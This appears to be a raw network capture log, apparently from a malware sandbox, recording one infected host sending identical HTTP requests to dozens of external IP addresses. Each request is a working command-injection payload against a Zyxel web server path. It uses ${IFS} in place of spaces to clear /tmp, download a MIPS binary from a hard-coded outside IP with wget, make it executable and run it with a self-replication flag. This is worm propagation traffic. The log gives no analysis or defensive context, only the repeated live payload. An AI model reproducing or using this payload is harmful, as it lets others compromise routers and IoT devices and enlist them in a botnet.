                                    Jan 13, 2024 19:02:41.348989964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6188192.168.2.1337074189.207.85.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349044085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6189192.168.2.134992859.203.66.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349070072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6190192.168.2.1359402164.207.167.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349128962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6191192.168.2.134996699.211.247.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349189043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6192192.168.2.133450294.154.194.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349265099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6193192.168.2.133309083.217.5.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349309921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6194192.168.2.134246644.120.16.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349373102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6195192.168.2.133347237.107.104.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349442005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6196192.168.2.1354594150.142.148.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349498987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6197192.168.2.1334096110.56.167.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349539995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6198192.168.2.1342360206.57.72.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349623919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6199192.168.2.133413479.252.80.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349642038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6200192.168.2.133344266.59.62.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349698067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6201192.168.2.1358356154.155.97.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349761963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6202192.168.2.1349246206.170.41.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349816084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6203192.168.2.1343662165.33.62.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349843979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6204192.168.2.1341462148.27.66.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349884033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6205192.168.2.1339566192.140.74.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349951029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6206192.168.2.1339654192.215.195.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.349992037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6207192.168.2.135363047.133.113.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350040913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6208192.168.2.1358438203.61.184.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350086927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6209192.168.2.135908624.66.79.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350141048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6210192.168.2.1338948125.32.95.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350215912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6211192.168.2.133687052.237.143.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350274086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6212192.168.2.1358096164.51.165.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350321054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6213192.168.2.1353104114.112.180.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350363970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6214192.168.2.1348238101.243.8.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350440979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6215192.168.2.1356108171.151.32.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350508928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6216192.168.2.1359772159.131.86.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350563049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6217192.168.2.1357712166.116.106.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350615025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6218192.168.2.1349620175.107.57.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350699902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6219192.168.2.134490425.123.9.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350752115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6220192.168.2.1334864157.74.3.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350820065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6221192.168.2.134925282.60.80.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350876093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6222192.168.2.1338498139.74.173.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.350922108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6223192.168.2.1333966212.237.226.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351001978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6224192.168.2.133705865.19.116.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351083040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6225192.168.2.1340848162.234.35.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351157904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6226192.168.2.135129613.185.9.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351200104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6227192.168.2.133567682.160.240.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351238012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6228192.168.2.1360842152.222.220.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351294994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6229192.168.2.1351248219.25.151.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351311922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6230192.168.2.133368819.114.140.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351375103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6231192.168.2.1334942194.48.132.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351442099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6232192.168.2.134915478.253.109.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351515055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6233192.168.2.1337878194.226.142.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351581097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6234192.168.2.1336052204.131.73.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351659060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6235192.168.2.1336880201.224.211.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351699114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6236192.168.2.1332818150.77.58.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351746082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6237192.168.2.133882272.201.60.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351779938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6238192.168.2.1358634111.222.195.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351819992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6239192.168.2.1349412134.143.235.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351905107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6240192.168.2.133562071.94.10.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.351973057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6241192.168.2.1334840161.187.172.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352025032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6242192.168.2.134241476.198.72.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352075100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6243192.168.2.135793676.205.26.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352174044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6244192.168.2.1360938109.90.226.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352224112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6245192.168.2.1349318174.246.97.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352294922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6246192.168.2.133341888.210.95.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352371931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6247192.168.2.1339714133.139.156.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352447033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6248192.168.2.1343304190.92.126.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352447033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6249192.168.2.1349432216.69.119.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.352463007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6250192.168.2.1357926129.184.8.205443
                                    TimestampBytes transferredDirectionData
